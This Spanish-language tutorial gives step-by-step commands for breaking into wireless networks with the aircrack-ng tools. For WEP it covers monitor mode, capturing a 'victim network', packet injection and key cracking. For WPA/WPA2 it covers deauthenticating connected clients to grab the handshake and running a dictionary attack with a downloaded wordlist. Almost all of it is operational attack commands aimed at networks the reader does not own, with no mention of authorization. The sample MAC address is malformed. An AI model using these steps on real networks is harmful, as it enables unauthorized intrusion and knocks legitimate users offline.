Claves WEP: -Paso 1: Lo Primero es saber el nombre de nuestra interface (Tarjeta Wireless) para ponerla en Modo Monitor, para esto abrimos una Terminal y escribimos lo siguiente: airmon-ng ...nos aparecerá el nombre de nuestra interfaz, el chipset y el driver en mi caso es una el nombre de la interfaz es Wlan0 -Paso 2: Ahora qué conocemos el nombre de nuestra interfaz vamos a ponerla en Modo Monitor y escribimos lo siguiente: airmon-ng start wlan0 Ya tenemos nuestra tarjeta en Modo Monitor (monitor mode enabled on mon0) y como se podrán dar cuenta "mon0" es el nombre de la interfaz en modo monitor. -Paso 3: Ahora vamos a escanear redes disponibles con el siguiente comando: airodump-ng mon0 y con esto comenzará a mostrarnos las Redes Disponibles. Para seleccionar la Red Víctima tenemos qué detener el escaneo presionando ctrl+c -Paso 4: En este paso vamos a Capturar la Red Víctima para esto escribimos el siguiente comando: airodump-ng -w redes -c 11 --bssid 98C:11:61:5A:50 mon0 donde: -w = especifica el nombre del archivo donde se guarda la captura de datos -c = especifica el canal de la Red --bssid = especifica Mac de Punto de Acceso mon0 = especifica la interfaz de la targeta de Red en Modo Monitor "suele suceder que algunas veces los datos no cargan (quedan en cero), para esto les explicare como solucionarlo mas abajo cuando vean como crackear wpa" -Paso 5: Abrimos una segunda Terminal (sin cerrar la primera) y escribimos lo siguiente: aireplay-ng -1 0 -a 98C:11:61:5A:50 mon0 esto es para Asociar su pc con la Red Víctima -Paso 6: Ahora empieza lo bueno, a inyectar paquetes a la red, para esto tecleamos lo siguiente: aireplay-ng -3 -b 98C:11:61:5A:50 mon0 Ataque Chop Chop aireplay-ng -1 1 -a (mac atacada) -h (mi mac) mon0 con esto enviaremos y recibiremos paquetes. Vamos a la primera Terminal y en la columna #Data se incrementará rapidamente, y esperamos a que llegue a los 30,000 (mientras mas datos mejor, aunque he descifrado claves con tan solo 10.000 datos), para poder desencriptar la Clave -Paso 7: Cuando llegue a los 30,000 datos abrimos una tercera y última Terminal y escribimos el famoso comando: aircrack-ng redes-01.cap donde: redes = archivo donde se guarda la captura (.cap) el mismo qué mencionamos en el paso 4 (es importante poner el .cap al final del nombre de la red) damos enter y empezará a decifrar a la clave y Vualá Clave desencriptada Key Found! (password) claves WPA y WPA2 Esto pareciera ser un poco mas complicado, pero no es tan asi vamos a tener que repetir los mismos pasos vistos anteriormente hasta el paso 4 A continuación debemos abrir otra terminal para capturar el handshake. Es imprescindible que exista un cliente conectado. Para conseguir el handshake tenemos que desconectar al cliente que hay conectado para que se vuelva a conectar, para lo que tenemos que introducir el siguiente comando: aireplay-ng –deauth 20 -a BSSID -c CLIENTE mon0 Notese que los clientes conectados son 2 cada uno con bssid distinta -Paso siguiente: Ahora vamos a comprobar si hemos capturado el handshake, para ello vamos a la terminal que teníamos abierta y si hemos tenido éxito veremos arriba a la derecha WPA handshake MAC. Se puede apreciar en la siguiente imagen: -Paso siguiente siguiente: Una vez tengamos el handshake nos queda el último paso, el ataque con el diccionario. Esta forma de ataque consiste en probar si la contraseña WPA es la misma que una seria de palabras previamente guardadas en un archivo de texto. Si coincide alguna de ellas con la contraseña, nos lo indicara "les dejo el mejor diccionario que he podido encontrar en la web, descarguenlo y sigan las instrucciones" Gran diccionario (Rapidshare): https://rapidshare.com/#!download|708p7|383398268|Mega_diccionario_WPA.rar|157779|R~9C2AEAC7FA227D5ED28502D81B9BD69C|0|0 -Paso siguiente siguiente siguiente: Ya con los diccionarios descargados, vamos a probar a hacer un ataque contra el diccionario. Para eso escribimos en otra terminal lo siguiente: aircrack-ng -a 2 -w /ruta/al/diccionario NombreDeArchivo-01.cap Si tenemos éxito nos aparecerá la clave